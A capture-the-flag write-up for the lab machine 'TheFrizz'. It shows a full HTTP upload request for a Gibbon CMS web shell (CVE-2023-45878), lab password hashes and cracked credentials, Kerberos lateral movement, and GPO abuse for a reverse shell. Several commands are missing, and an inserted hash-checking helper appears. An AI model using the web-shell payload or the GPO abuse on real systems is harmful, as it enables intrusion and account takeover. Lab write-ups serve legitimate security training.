TheFrizz writeup
TheFrizz is a hybrid box that combines web exploitation, database credential extraction, and Active Directory lateral movement. We will exploit a Gibbon CMS RCE (CVE-2023-45878), extract and crack hashes, use Kerberos authentication, and abuse Group Policy Objects (GPO) for privilege escalation.
Scan results uncover AD ports and also a web server on port 80.
The web server has a link to a login portal written with the Gibbon framework. The footer of that page leaks version v25.0.00.
cvedetails.com shows that this version is vulnerable to RCE: https://www.cvedetails.com/cve/CVE-2023-45878/
Exploit tutorial: https://herolab.usd.de/security-advisories/usd-2023-0025/
The following request will write the payload <?php echo system($_GET['cmd'])?> to the file asdf.php:
POST /index.php?q=/modules/System%20Admin/module_install.php HTTP/1.1
Host: thefrizz.htb
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="asdf.php"
Content-Type: application/x-php

<?php echo system($_GET['cmd'])?>
------WebKitFormBoundary--
Then establish a reverse shell:
Access the shell via the uploaded file:
In config.php, find the first set of credentials:
With MySQL access, open the database and find the gibbonperson table containing the passwords.
Recover the password using hashcat. Gibbon stores a SHA-256 hash together with a per-user salt, so format each line as username:hash:salt:
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
Run hashcat:
This gives the cleartext password: Jenni_Luvs_Magic23.
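An added helper, not part of the original writeup, to confirm that a recovered password really reproduces a stored Gibbon record before reusing the credential, and to tell which salt ordering the hash uses (the assumption here is that Gibbon stores sha256(salt + password), which corresponds to hashcat mode 1420; the hypothetical functions and the constructed test data below are mine, and the sample record is the one quoted above):

```python
import hashlib

# Record in the username:hash:salt layout used above (copied from the page).
SAMPLE_RECORD = ("f.frizzle:"
                 "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:"
                 "/aACFhikmNopqrRTVz2489")

# The two concatenation orders hashcat supports for salted SHA-256.
# Assumption: Gibbon uses sha256(salt + password), i.e. hashcat -m 1420.
ORDERS = {
    "salt+pass": (1420, lambda salt, pw: salt + pw),
    "pass+salt": (1410, lambda salt, pw: pw + salt),
}


def parse_record(line):
    """Split a username:hash:salt line; the salt may itself contain ':'."""
    user, digest, salt = line.strip().split(":", 2)
    digest = digest.lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("hash field is not a hex SHA-256 digest")
    return user, digest, salt


def make_record(user, password, salt, order="salt+pass"):
    """Build a record under the chosen order (used to construct test data)."""
    _, combine = ORDERS[order]
    digest = hashlib.sha256(combine(salt, password).encode()).hexdigest()
    return f"{user}:{digest}:{salt}"


def check_record(line, candidate):
    """Return the order name under which candidate reproduces the hash, else None."""
    _, digest, salt = parse_record(line)
    for name, (_, combine) in ORDERS.items():
        if hashlib.sha256(combine(salt, candidate).encode()).hexdigest() == digest:
            return name
    return None


def hashcat_mode(order):
    """Map a detected order to the hashcat mode that cracks it."""
    return ORDERS[order][0]


if __name__ == "__main__":
    order = check_record(SAMPLE_RECORD, "Jenni_Luvs_Magic23")
    print(order, hashcat_mode(order) if order else "no match")
```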
Then use the credentials on Active Directory.
If you have a clock-skew problem, synchronize with:
Generate a Kerberos configuration file and place it at /etc/krb5.conf so that the Kerberos tooling can find the target's realm and KDC.
Collect BloodHound data with RustHound:
Save a TGT ticket (getTGT.py is part of the Impacket toolkit):
Use the Kerberos ticket to authenticate over SSH:
Inside the C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103 directory, notice a file and its metadata.
The metadata gives the file's original name: wapt-backup-sunday.
Use SCP to download that file, or, if the SCP copy produces a hash mismatch, place the file in the web root and download it over HTTP instead.
Then in conf/waptserver.ini you will find the WAPT credentials:
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
(base64-decoded: !suBcig@MehTed!R)
Try the decoded password against the domain users with netexec, using the Kerberos auth you set up earlier:
M.SchoolBus matches!

This user can create group policies. Also, because it is in the remote management group, we can SSH in as this user directly.
Get a new TGT:
Move SharpGPOAbuse.exe to the target.
Create a new GPO:
New-GPO -Name "MaliciousPolicy"
To reduce noise, don't target every computer.
Create a GPO policy that runs a reverse-shell payload.
Now force the update to be applied immediately:
gpupdate /force
Credentials
mysql:MrGibbonsDB:MisterGibbs!Parrot!?1
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
f.frizzle:Jenni_Luvs_Magic23
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
(!suBcig@MehTed!R)
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
M.SchoolBus:!suBcig@MehTed!R